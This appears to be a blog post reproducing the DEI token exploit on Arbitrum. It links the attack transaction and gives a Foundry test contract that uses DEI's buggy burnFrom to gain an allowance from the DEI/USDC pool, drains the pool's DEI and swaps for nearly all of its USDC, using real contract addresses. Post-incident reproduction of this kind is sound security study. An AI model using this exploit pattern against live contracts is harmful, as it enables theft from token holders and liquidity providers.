{"content":{"title":"DEI Vulnerability Reproduction","body":"# 1.\tVulnerability Overview\r\nhttps://twitter.com/eugenioclrc/status/1654576296507088906\r\n\r\n![1.png](https://img.learnblockchain.cn/attachments/2023/05/nJgpWIQK64590bd29b03a.png)\r\n# 2.\tRelated Addresses or Transactions\r\nhttps://explorer.phalcon.xyz/tx/arbitrum/0xb1141785b7b94eb37c39c37f0272744c6e79ca1517529fec3f4af59d4c3c37ef    (attack transaction)\r\n# 3.\tProfit Analysis\r\n\r\n![3.png](https://img.learnblockchain.cn/attachments/2023/05/TDlsuCKO64590c023e811.png)\r\n# 5.\tVulnerability Reproduction\r\n\r\n```solidity\r\n// SPDX-License-Identifier: LGPL-3.0-only\r\npragma solidity ^0.8.10;\r\n\r\nimport \"forge-std/Test.sol\";\r\nimport \"./interface.sol\";\r\nimport \"../contracts/ERC20.sol\";\r\n\r\n// Minimal interface for the DEI token; its flawed burnFrom is the entry point of the attack\r\ninterface DEI {\r\n    function burnFrom(address account, uint256 amount) external;\r\n}\r\n\r\n// Minimal interface for the victim DEI/USDC AMM pair\r\ninterface AMM {\r\n    function sync() external;\r\n    function swap(uint amount0Out, uint amount1Out, address to, bytes calldata data) external;\r\n    function getAmountOut(uint amountIn, address tokenIn) external returns (uint256);\r\n}\r\n\r\ncontract ContractTest is Test {\r\n\r\n    address constant dei = 0xDE1E704dae0B4051e80DAbB26ab6ad6c12262DA0;\r\n    address constant victim = 0x7DC406b9B904a52D10E19E848521BbA2dE74888b; // DEI/USDC pool\r\n    address constant usdc = 0xFF970A61A04b1cA14834A43f5dE4533eBDDB5CC8;\r\n\r\n    // CheatCodes is expected to be declared in ./interface.sol (same address as forge-std's vm)\r\n    CheatCodes cheats = CheatCodes(0x7109709ECfa91a80626fF3989D68f67F5b1DD12D);\r\n\r\n    function setUp() public {\r\n        // Fork Arbitrum two blocks before the attack transaction\r\n        cheats.createSelectFork(\"arbitrum\", 87626026 - 2);\r\n    }\r\n\r\n    function testExploit() external {\r\n        // Step 1: approve the pool as spender, then call burnFrom(pool, 0).\r\n        // The buggy burnFrom reads allowance(msg.sender, account) and writes it back\r\n        // with owner and spender swapped, so the pool ends up approving this contract.\r\n        IERC20(dei).approve(victim, type(uint256).max);\r\n        DEI(dei).burnFrom(victim, 0);\r\n        emit log_named_decimal_uint(\"Attacker DEI allowance from pool\", IERC20(dei).allowance(victim, address(this)), 18);\r\n\r\n        // Step 2: pull almost all DEI out of the pool (leave 1 wei) and sync its reserves\r\n        uint256 victimNum = IERC20(dei).balanceOf(victim);\r\n        emit log_named_decimal_uint(\"Pool DEI balance\", victimNum, 18);\r\n        IERC20(dei).transferFrom(victim, address(this), victimNum - 1);\r\n        AMM(victim).sync();\r\n        emit log_named_decimal_uint(\"Attacker DEI balance after transferFrom\", IERC20(dei).balanceOf(address(this)), 18);\r\n\r\n        // Step 3: with the DEI reserve nearly empty, the same DEI now buys almost all of the pool's USDC\r\n        uint outNum = AMM(victim).getAmountOut(victimNum - 1, dei);\r\n        emit log_named_decimal_uint(\"USDC out\", outNum, 6);\r\n\r\n        IERC20(dei).transfer(victim, victimNum - 1);\r\n        AMM(victim).swap(0, outNum, address(this), \"\");\r\n\r\n        emit log_named_decimal_uint(\"Attacker USDC balance after swap\", IERC20(usdc).balanceOf(address(this)), 6);\r\n    }\r\n}\r\n```"},"author":{"user":"https://learnblockchain.cn/people/10579","address":null},"history":null,"timestamp":1683557467,"version":1}